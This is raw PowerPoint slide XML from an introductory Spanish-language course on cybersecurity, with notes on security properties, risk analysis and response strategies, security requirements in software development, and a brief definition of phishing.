                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Confidencialidad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Garantiza que la información esté protegida contra acceso no autorizado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Integridad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Asegura que la información no se altere de manera no autorizada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Disponibilidad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La información y los sistemas deben estar disponibles y funcionando cuando se necesiten.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Autenticidad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Verifica la autenticidad de los usuarios y la información.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Trazabilidad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Registra y rastrea las actividades y eventos en el sistema para su seguimiento.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="es-ES" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>El análisis de riesgos es un proceso fundamental en la seguridad informática. Implica:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Estimación de probabilidad de posibles impactos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Evaluar cuán probable es que ocurran amenazas y cuáles serían sus efectos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Estrategias de respuesta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Ante los riesgos identificados, podemos:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Evitarlos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> cambiando el diseño o enfoque del sistema.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Controlarlos o mitigarlos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> implementando medidas de seguridad adecuadas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Aceptarlos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> presupuestando su coste y asumiendo la posibilidad de que ocurran.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Transferirlos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> mediante la contratación de seguros o servicios que deleguen la responsabilidad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>El análisis de riesgos es esencial para tomar decisiones informadas sobre cómo proteger la información y los sistemas en función de su valor y las amenazas potenciales.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Marcador de número de diapositiva 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4DDCF61-309B-5521-0E62-4E839295E6B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1209222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CFD8A-4DEA-B91F-6FD4-8058ECDC16B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89F7C2-269B-C7C2-E77A-D124E9D6A18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A471920-8979-7143-A8F5-67A72DC8FBD5}"/>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57FA633A-DE79-CA17-9C99-FA9B0F046D10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2556921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A7ACF-DF03-3BCB-A1F6-26CB49444A1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7CD1294-5493-377A-5516-66048C0073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962CAF-0FE0-0459-58FE-6F4610FE3A7C}"/>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251F4272-754D-6614-5B12-00D999B2939B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="890954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165E8-AFBE-32D4-357E-AE4BC9A135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CCEF79A-C4BF-4DE3-6DEF-47E67C5885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BBDDBE-A51B-FCE4-317C-1DA834214B21}"/>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D4D46986-2A28-CAEC-607B-E4564AA57BF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3383435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9871A-78D3-0D9A-62B0-63E9D35CDF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6EF4364-9FCD-2035-BAF0-636CDDC324E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0949EBE-9F9C-BBDB-9D7D-F95AE14F8B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tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>conocido como suplantación de identidad, es un término informático que denomina un modelo de abuso informático y que se comete mediante el uso de un tipo de ingeniería social, caracterizado por intentar adquirir información confidencial de forma fraudulenta - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.incibe.es/protege-tu-empresa/blog/phishing-no-muerdas-el-anzuelo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="es-ES" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRP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97860DDB-4DB8-81D2-49AD-02E3E53F6E8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59378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En el desarrollo de software, es crucial cumplir con requisitos mínimos de seguridad. Sin embargo, estos requisitos pueden variar significativamente de un proyecto a otro. La clave está en analizar los riesgos y el contexto particular del software que estamos desarrollando para determinar los requisitos de seguridad necesarios.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Análisis de riesgo</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Identificar y priorizar los riesgos en el proyecto es esencial.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Debes tomar decisiones sobre cómo responder a estos riesgos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Visión incompleta es mejor que ninguna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Es importante recordar que es preferible tener una visión incompleta de la seguridad de tu software que no tener ninguna.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Visibilidad y certeza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El análisis de riesgo proporciona visibilidad y certeza sobre la situación de seguridad del proyecto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="es-ES" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="es-ES" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>El equilibrio entre costes y la calidad y seguridad del software es un desafío constante en el desarrollo de software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Insuficiencia de recursos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 menudo, los recursos disponibles, como tiempo y presupuesto, son limitados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Esto puede influir en la calidad y seguridad del software si no se gestionan adecuadamente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Toma de decisiones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En el desarrollo de software, debemos tomar decisiones sobre cómo asignar los recursos disponibles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Equilibrar costes, calidad y seguridad es una consideración crítica.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>En resumen, el cumplimiento de requisitos mínimos de seguridad es fundamental en el desarrollo de software, y esto implica analizar los riesgos y tomar decisiones adecuadas. Además, debemos ser conscientes de la constante lucha por equilibrar costes, calidad y seguridad, especialmente cuando los recursos son limitados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Marcador de número de diapositiva 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2046080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5644B-88BD-1FB9-2D9D-80E29B4293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F855EE0-A5C9-C958-C1EC-C7B71156E3C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D2C26A-DC43-E730-3383-7A97633672B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La ciberseguridad o seguridad informática es la suma de procesos y herramientas que se emplean para proteger anticipadamente o defender de ciberataques a dispositivos, sistemas electrónicos, servidores, redes y programas, de posibles ataques digitales.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Por lo general, estos ciberataques buscan acceder, modificar o eliminar información confidencial o de suma relevancia, paralizar las actividades o bien exigir “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>rescates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>” por la información sustraída o manipulada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La aplicación de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>medidas eficaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> que contrarrestan esto se vuelve cada vez más complejo, debido a la multitud de dispositivos  y a la constante sofisticación que emplean los atacantes.</a:t>
            </a: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77AE7FBF-18BE-3CF8-266F-AC350C0B3CD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198634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A500D-D67A-9C09-AED7-C5231443346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7758D8-97AD-CBC4-2462-9BBE3E58A03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B4B034-D847-3A8B-514D-7E95DAF08693}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>La ciberseguridad es una práctica cada vez más necesaria en un mundo cada vez más digitalizado y, por ende, más desprotegido ante los ataques informáticos, tanto internos como externos. Esto lo convierte en una actividad cada vez más atractiva para las organizaciones cibercriminales por los grandes beneficios que reporta.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ante este panorama donde casi todas las actividades se dan en la red, la ciberseguridad sirve para prevenir ataques informáticos, detectar vulnerabilidades y fisuras de seguridad, y establecer las pertinentes medidas de corrección y reparación.</a:t>
            </a:r>
          </a:p>
          <a:p>
